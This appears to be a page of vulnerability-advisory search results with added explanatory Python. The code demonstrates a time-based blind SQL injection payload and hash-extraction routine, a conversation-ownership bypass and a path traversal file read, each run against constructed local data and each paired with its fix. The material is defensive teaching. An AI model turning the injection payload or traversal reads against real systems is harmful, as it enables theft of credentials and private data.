28055 matches found
GHSA-4HC4-8599-XH2H OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service
Summary: Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attac...
SQL Injection
Overview: devcode-it/openstamanager is a management software for technical assistance and electronic invoicing. Affected versions of this package are vulnerable to SQL Injection via the term parameter in the global search functionality. An attacker can extract sensitive database contents, including...
SQL Injection
Overview: devcode-it/openstamanager is a management software for technical assistance and electronic invoicing. Affected versions of this package are vulnerable to SQL Injection via the idarticolo parameter in the article pricing module's completion handler. An attacker can extract sensitive databa...
SQL Injection
Overview: devcode-it/openstamanager is a management software for technical assistance and electronic invoicing. Affected versions of this package are vulnerable to SQL Injection via the idanagrafica parameter in the init.php file. An attacker can extract sensitive database information, including...
CVE-2025-10258
Infinera DNA is vulnerable to a time-based SQL injection vulnerability due to insufficient input validation, which may result in leaking of sensitive information...
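The OpenSTAManager entries above (the `term` global-search parameter in particular) and the Infinera DNA entry both describe time-based blind SQL injection. The following is an added illustration, not code from either project, of how a single spliced search parameter becomes a byte-by-byte read of another table, and why binding the parameter closes the hole. Everything in it is hypothetical: the in-memory SQLite schema, the table and column names, the sample rows, and a SLEEP() function registered on the connection to stand in for MySQL's SLEEP().

```python
"""Added illustration, not code from OpenSTAManager or Infinera DNA: time-based
blind SQL injection through a search parameter, and the parameterised fix.

Hypothetical pieces: the in-memory SQLite schema, the table and column names,
the constructed sample rows, and a SLEEP() function registered to mimic MySQL.
"""
import sqlite3
import time

DELAY = 0.02  # seconds the injected SLEEP() stalls; the oracle threshold is half this


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the payload behaves as it would on MySQL.
    con.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE articles (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'admin', 'a9f3');   -- constructed sample hash prefix
        INSERT INTO articles VALUES (1, 'printer toner'), (2, 'network switch');
        """
    )
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    # Vulnerable pattern: the user-supplied term is spliced into the SQL text.
    sql = "SELECT name FROM articles WHERE name LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_fixed(con: sqlite3.Connection, term: str) -> list:
    # Hardened pattern: the term is bound as a parameter and can only ever be data.
    sql = "SELECT name FROM articles WHERE name LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


def delay_oracle(search, con: sqlite3.Connection, condition: str) -> bool:
    """True iff `condition` holds in the database, judged purely by response time.

    The payload closes the LIKE literal, stalls only when `condition` is true, and
    re-opens a literal so the trailing `%'` of the original query still parses.
    """
    payload = (
        "%' AND (SELECT CASE WHEN (" + condition + ") THEN SLEEP(" + str(DELAY)
        + ") ELSE 0 END) = 0 AND '1%' = '1"
    )
    start = time.monotonic()
    search(con, payload)
    return time.monotonic() - start >= DELAY / 2


def is_injectable(search, con: sqlite3.Connection) -> bool:
    """A tautology should stall only if the search function is injectable."""
    return delay_oracle(search, con, "1=1")


def extract_hash_prefix(search, con: sqlite3.Connection, length: int) -> str:
    """Recover the first `length` characters of admin's hash, one binary search per byte."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (
                "unicode(substr((SELECT password_hash FROM users WHERE username = 'admin'), "
                + str(pos) + ", 1)) > " + str(mid)
            )
            if delay_oracle(search, con, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable injectable:", is_injectable(search_vulnerable, db))       # True
    print("fixed injectable:", is_injectable(search_fixed, db))                 # False
    print("leaked hash prefix:", extract_hash_prefix(search_vulnerable, db, 4))  # a9f3
```

The oracle never looks at the rows returned, only at elapsed time, which is why these bugs are exploitable even when the vulnerable endpoint discards its result set. Against `search_fixed` the same payload is just a LIKE pattern that matches nothing and costs no time, so the binary search collapses to noise.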
CVE-2026-0598
A security flaw was identified in the Ansible Lightspeed API conversation endpoints that handle AI chat interactions. The APIs do not properly verify whether a conversation identifier belongs to the authenticated user making the request. As a result, an attacker with valid credentials could acces...
CVE-2023-38010
IBM Cloud Pak System displays sensitive information in user messages that could aid in further attacks against the system...
PT-2026-6676
Name of the Vulnerable Software and Affected Versions: Ansible Lightspeed (affected versions not specified). Description: The Ansible Lightspeed API conversation endpoints, which manage AI chat interactions, do not adequately confirm if a conversation identifier corresponds to the authenticated user...
DeepAudit Security Vulnerability
DeepAudit is an automated vulnerability auditing tool developed by the individual developer lintsinghua. DeepAudit versions 3.0.4 and earlier contain a security vulnerability that stems from improper access control on the /api/v1/users endpoint, which may allow any authenticate...
PT-2026-6848
Summary: Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attac...
Red Hat Ansible Automation Platform 2 Security Vulnerability
Red Hat Ansible Automation Platform 2 is software developed by Red Hat Inc. for building, deploying, and managing automation processes. A security vulnerability exists in Red Hat Ansible Automation Platform 2. It stems from the conversation endpoints that handle AI chat...
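The three Ansible Lightspeed / Ansible Automation Platform entries above describe the same missing check: the conversation endpoint authenticates the caller but never confirms that the conversation identifier belongs to that caller. The following is an added illustration of that check, not code from Ansible Lightspeed or Ansible Automation Platform; the in-memory store, handler names, status codes and the two conversations are all hypothetical and constructed for the example.

```python
"""Added illustration, not Ansible Lightspeed or Ansible Automation Platform
code: the ownership check the advisory describes as missing on the
conversation endpoints, and a scoped lookup that makes it hard to forget.

Hypothetical pieces: the in-memory store, handler names, status codes and
the two constructed conversations.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Conversation:
    conv_id: str
    owner_id: str
    messages: List[str] = field(default_factory=list)


def sample_store() -> Dict[str, Conversation]:
    # Constructed data: two authenticated users, one conversation each.
    return {
        "c-1001": Conversation("c-1001", "alice", ["alice: write a playbook that installs nginx"]),
        "c-1002": Conversation("c-1002", "bob", ["bob: rotate the vault password on prod"]),
    }


def get_conversation_vulnerable(store, caller_id: str, conv_id: str) -> Tuple[int, Optional[List[str]]]:
    """Authenticates the caller (caller_id is already verified) but never checks ownership."""
    conv = store.get(conv_id)
    if conv is None:
        return 404, None
    return 200, list(conv.messages)   # any authenticated user can read any conversation


def find_owned(store, caller_id: str, conv_id: str) -> Optional[Conversation]:
    """Single lookup that scopes every conversation access to the caller.

    A foreign id and a non-existent id both return None, so a caller cannot use
    a 403-versus-404 difference to enumerate other users' conversation ids.
    """
    conv = store.get(conv_id)
    if conv is None or conv.owner_id != caller_id:
        return None
    return conv


def get_conversation_fixed(store, caller_id: str, conv_id: str) -> Tuple[int, Optional[List[str]]]:
    conv = find_owned(store, caller_id, conv_id)
    if conv is None:
        return 404, None
    return 200, list(conv.messages)


def append_message_fixed(store, caller_id: str, conv_id: str, text: str) -> int:
    # Every endpoint that takes a conversation id goes through the same scoped lookup,
    # so the write path cannot drift out of sync with the read path.
    conv = find_owned(store, caller_id, conv_id)
    if conv is None:
        return 404
    conv.messages.append(f"{caller_id}: {text}")
    return 201


if __name__ == "__main__":
    store = sample_store()
    print(get_conversation_vulnerable(store, "bob", "c-1001"))  # (200, [...]): bob reads alice's chat
    print(get_conversation_fixed(store, "bob", "c-1001"))       # (404, None)
```

Putting the owner comparison in one data-access helper rather than in each handler is the design choice worth copying: a new endpoint that forgets the check cannot be written without bypassing the helper.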
Sliver Vulnerable to Website Path Traversal / Arbitrary File Read (Authenticated)
Summary A Path Traversal vulnerability in the website content subsystem lets an authenticated operator read arbitrary files on the Sliver server host. This is an authenticated Path Traversal / arbitrary file read issue, and it can expose credentials, configs, and keys. Affected Component - Websit...
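The Sliver entry above is an authenticated path traversal: an operator-supplied path in the website content subsystem is opened without confining it to the website root. The following is an added illustration, not Sliver code, of the vulnerable join-and-open pattern beside a containment check on the canonicalised path. The directory layout, file names and contents are constructed for the example.

```python
"""Added illustration, not Sliver code: the containment check that confines a
website-content lookup to its root, beside the unchecked join that lets an
authenticated user read any file. Layout, names and contents are constructed.
"""
import os
import tempfile


class PathOutsideRoot(ValueError):
    """Raised when a requested path resolves outside the website root."""


def resolve_under_root(root: str, requested: str) -> str:
    root_real = os.path.realpath(root)
    # Strip leading separators: os.path.join discards `root` entirely when the
    # second argument is absolute, which is a traversal primitive of its own.
    candidate = os.path.realpath(os.path.join(root_real, requested.lstrip("/\\")))
    # realpath has collapsed `..` segments and followed symlinks, so comparing
    # canonical paths is sufficient; a textual check on `requested` would not be.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathOutsideRoot(requested)
    return candidate


def is_contained(root: str, requested: str) -> bool:
    try:
        resolve_under_root(root, requested)
    except PathOutsideRoot:
        return False
    return True


def read_website_file_vulnerable(root: str, requested: str) -> bytes:
    # Vulnerable pattern: join and open, trusting the operator-supplied path.
    with open(os.path.join(root, requested), "rb") as fh:
        return fh.read()


def read_website_file_fixed(root: str, requested: str) -> bytes:
    with open(resolve_under_root(root, requested), "rb") as fh:
        return fh.read()


def make_sample_layout() -> str:
    """Create <tmp>/site/index.html and <tmp>/server.key one level above the root."""
    base = tempfile.mkdtemp(prefix="traversal-demo-")
    site = os.path.join(base, "site")
    os.makedirs(os.path.join(site, "assets"))
    with open(os.path.join(site, "index.html"), "wb") as fh:
        fh.write(b"<h1>hello</h1>")
    with open(os.path.join(base, "server.key"), "wb") as fh:
        fh.write(b"-----BEGIN CONSTRUCTED KEY-----")
    return site


if __name__ == "__main__":
    site = make_sample_layout()
    print(read_website_file_vulnerable(site, "../server.key"))  # key from outside the root
    print(is_contained(site, "../server.key"))                  # False
    print(read_website_file_fixed(site, "assets/../index.html"))  # b'<h1>hello</h1>'
```

The check accepts `assets/../index.html`, which normalises to a file inside the root, and rejects anything whose canonical form leaves it, including absolute paths and `..` chains that pass through a legitimate subdirectory first.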
CVE-2025-15482
The Chapa Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.3 via 'chapaproceed' WooCommerce API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including t...
Ilevia EVE X1 Server
RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary shell commands and disclose sensitive system information. 2. RECOMMENDED PRACTICES CISA recommends users take defensive measures to minimize the risk of exploitation of these...
CVE-2025-33081
IBM Concert 1.0.0 through 2.1.0 stores potentially sensitive information in log files that could be read by a local user...
Microsoft Azure Functions Information Disclosure Vulnerability
Microsoft Azure Functions is a hosted Platform-as-a-Service (PaaS) offering from Microsoft Corporation (USA) that delivers event-driven and scheduled compute resources for Azure cloud services. An information disclosure vulnerability exists in Microsoft Azure Functions, which can be exploited by an...
F5 Networks BIG-IP : BIG-IP Edge Client for Windows vulnerability (K000158931)
The version of F5 Networks BIG-IP installed on the remote host is prior to 17.1.3.1 / None. It is, therefore, affected by a vulnerability as referenced in the K000158931 advisory. A vulnerability exists in BIG-IP Edge Client and browser VPN clients on Windows that may allow attackers to gain acce...
phpMyChat Plus SQL Injection Vulnerability
phpMyChat Plus is a chat room system developed by Ciprianmp. Version 1.98 of phpMyChat Plus contains an SQL injection vulnerability. This vulnerability stems from the pmcusername parameter in the deluser.php page, which may lead to the exposure of sensitive database information...
ROS-20260205-73-0001
A vulnerability in the net/can/bcm.c component of the Linux kernel is an out-of-bounds read (reading outside the allowed data buffer boundaries). Exploitation of the vulnerability may allow an attacker to gain access to sensitive data and also cause a denial of service...
Google Android Information Disclosure Vulnerability (CNVD-2026-10641)
Google Android is a Linux-based open source operating system from Google. Google Android suffers from an information disclosure vulnerability that stems from a key-pairing-based logic error that can be exploited by an attacker to obtain sensitive information...